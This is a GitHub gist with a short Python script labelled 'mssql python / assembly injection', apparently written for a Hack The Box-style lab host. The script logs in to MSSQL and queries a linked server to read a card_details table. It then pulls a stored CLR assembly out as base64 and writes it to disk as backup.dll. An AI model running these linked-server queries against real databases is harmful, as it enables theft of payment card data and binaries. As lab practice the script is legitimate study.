Created
February 10, 2022 01:55
-
-
Save shollingsworth/43694c07a0392627112471e053b2b0a8 to your computer and use it in GitHub Desktop.
mssql python / assembly injection
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # -*- coding: utf-8 -*- | |
| """Do mssql stuff.""" | |
| from base64 import b64decode | |
| import bs4 | |
| import pymssql | |
| HOST = "web.teignton.htb" | |
| PORT = 1433 | |
| USER = r"TEIGNTON.HTB\karl.memaybe" | |
| PASS = "xxxxxx" | |
| DB = "tempdb" | |
| DEST_FILE = "backup.dll" | |
| QUERY = r""" | |
| select * from openquery("WEB\CLIENTS", 'SELECT * FROM clients..card_details'); | |
| """ | |
| QUERY = r""" | |
| select | |
| content | |
| from [WEB\CLIENTS].clients.sys.assembly_files | |
| where assembly_id = 65536 FOR XML AUTO, BINARY BASE64 | |
| """ | |
| def main(): | |
| """Run main function.""" | |
| conn = pymssql.connect(f"{HOST}:{PORT}", USER, PASS, DB) | |
| cursor = conn.cursor(as_dict=True) | |
| cursor.execute(QUERY) | |
| values = [] | |
| for row in cursor: | |
| values += row.values() | |
| txt = "".join(values) | |
| obj = bs4.BeautifulSoup(txt, features="lxml") | |
| val = [i.attrs.get("content") for i in obj.find_all() if i.attrs.get("content")][0] | |
| with open(DEST_FILE, "wb") as fileh: | |
| print(f"Writing: {DEST_FILE}") | |
| fileh.write(b64decode(val)) | |
| if __name__ == "__main__": | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment